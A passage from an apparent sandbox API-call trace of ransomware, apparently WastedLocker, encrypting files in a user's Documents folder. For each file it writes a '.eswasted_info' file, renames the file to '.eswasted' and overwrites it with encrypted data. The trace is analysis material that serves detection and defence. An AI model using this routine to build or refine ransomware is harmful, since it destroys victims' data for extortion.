CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.975] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.975] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\Hq74EARr.pptx") returned 72 [0072.975] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29a) returned 0x4e1ab8 [0072.975] lstrcpyW (in: lpString1=0x4e1b48, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.975] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0072.976] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.976] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0072.976] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\Hq74EARr.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\hq74earr.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.985] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.986] SetEndOfFile (hFile=0x100) returned 1 [0072.986] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.986] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.986] lstrcpyW (in: lpString1=0x4e1b48, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\Hq74EARr.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\hq74earr.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\Hq74EARr.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\hq74earr.pptx.eswasted")) returned 1 [0072.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\Hq74EARr.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\hq74earr.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.987] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.987] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xafab [0072.987] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xafab) returned 0x2d0000 [0072.987] CloseHandle (hObject=0xf8) returned 1 [0072.990] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.991] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.991] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.991] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.992] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.992] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.000] SetEndOfFile (hFile=0x100) returned 1 [0073.002] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0073.002] CloseHandle (hObject=0x100) returned 1 [0073.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0073.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef580 | out: hHeap=0x4a0000) returned 1 [0073.004] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0073.005] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0073.005] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\M8z8NfbudeloofPq9 n.csv") returned 82 [0073.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ae) returned 0x4f6210 [0073.005] lstrcpyW (in: lpString1=0x4f62b4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0073.005] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0073.006] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0073.006] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\M8z8NfbudeloofPq9 n.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\m8z8nfbudeloofpq9 n.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0073.006] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.007] SetEndOfFile (hFile=0x100) returned 1 [0073.007] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.007] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0073.008] lstrcpyW (in: lpString1=0x4f62b4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\M8z8NfbudeloofPq9 n.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\m8z8nfbudeloofpq9 n.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\M8z8NfbudeloofPq9 n.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\m8z8nfbudeloofpq9 n.csv.eswasted")) returned 1 [0073.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\M8z8NfbudeloofPq9 n.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\m8z8nfbudeloofpq9 n.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.008] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0073.008] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x58d7 [0073.008] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x58d7) returned 0x2d0000 [0073.009] CloseHandle (hObject=0x110) returned 1 [0073.011] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0073.012] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0073.012] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.012] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0073.012] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0073.012] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.237] SetEndOfFile (hFile=0x100) returned 1 [0073.239] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0073.239] CloseHandle (hObject=0x100) returned 1 [0073.241] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0073.241] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef670 | out: hHeap=0x4a0000) returned 1 [0073.241] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0073.242] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0073.242] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.242] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\fir9i58QvFjFjUfIbL.pps") returned 100 [0073.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2d2) returned 0x4e1368 [0073.242] lstrcpyW (in: lpString1=0x4e1430, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0073.242] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0073.242] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0073.242] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\fir9i58QvFjFjUfIbL.pps.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\fir9i58qvfjfjufibl.pps.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0074.060] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0074.061] SetEndOfFile (hFile=0x100) returned 1 [0074.061] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.061] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.061] lstrcpyW (in: lpString1=0x4e1430, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\fir9i58QvFjFjUfIbL.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\fir9i58qvfjfjufibl.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\fir9i58QvFjFjUfIbL.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\fir9i58qvfjfjufibl.pps.eswasted")) returned 1 [0074.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\fir9i58QvFjFjUfIbL.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\fir9i58qvfjfjufibl.pps.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0074.062] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.062] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x26f8 [0074.063] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x26f8) returned 0x2d0000 [0074.063] CloseHandle (hObject=0xf8) returned 1 [0074.065] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0074.065] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0074.066] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0074.066] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.066] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0074.067] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0074.067] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.076] SetEndOfFile (hFile=0x100) returned 1 [0074.078] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.078] CloseHandle (hObject=0x100) returned 1 [0074.080] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0074.080] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0c00 | out: hHeap=0x4a0000) returned 1 [0074.080] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0074.081] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0074.081] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.081] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\hQdShtq 9vdE8tGX.odp") returned 98 [0074.081] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ce) returned 0x4e1368 [0074.081] lstrcpyW (in: lpString1=0x4e142c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.081] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0074.081] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0074.082] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0074.082] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\hQdShtq 9vdE8tGX.odp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\hqdshtq 9vde8tgx.odp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0074.082] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0074.083] SetEndOfFile (hFile=0x100) returned 1 [0074.083] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.083] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.084] lstrcpyW (in: lpString1=0x4e142c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\hQdShtq 9vdE8tGX.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\hqdshtq 9vde8tgx.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\hQdShtq 9vdE8tGX.odp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\hqdshtq 9vde8tgx.odp.eswasted")) returned 1 [0074.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\hQdShtq 9vdE8tGX.odp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\hqdshtq 9vde8tgx.odp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.084] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0074.084] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x4c7 [0074.084] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c7) returned 0x2d0000 [0074.084] CloseHandle (hObject=0x110) returned 1 [0074.086] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0074.086] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0074.087] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0074.087] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.087] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0074.088] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0074.088] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.263] SetEndOfFile (hFile=0x100) returned 1 [0074.892] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0074.892] CloseHandle (hObject=0x100) returned 1 [0074.893] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0074.893] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0d28 | out: hHeap=0x4a0000) returned 1 [0074.893] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e6078) returned 1 [0074.894] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0074.894] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0074.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\vSul3ZRnzuB3.odt") returned 94 [0074.894] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c6) returned 0x4c7238 [0074.894] lstrcpyW (in: lpString1=0x4c72f4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.894] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0074.894] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e6078) returned 1 [0074.895] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0074.895] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0074.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\vSul3ZRnzuB3.odt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\vsul3zrnzub3.odt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.985] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0074.986] SetEndOfFile (hFile=0x110) returned 1 [0074.986] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.987] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0074.987] lstrcpyW (in: lpString1=0x4c72f4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\vSul3ZRnzuB3.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\vsul3zrnzub3.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\vSul3ZRnzuB3.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\vsul3zrnzub3.odt.eswasted")) returned 1 [0074.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\vSul3ZRnzuB3.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\vsul3zrnzub3.odt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0074.987] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0074.987] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x109fd [0074.987] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x109fd) returned 0xb10000 [0074.987] CloseHandle (hObject=0x100) returned 1 [0074.992] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0074.992] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0074.993] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: 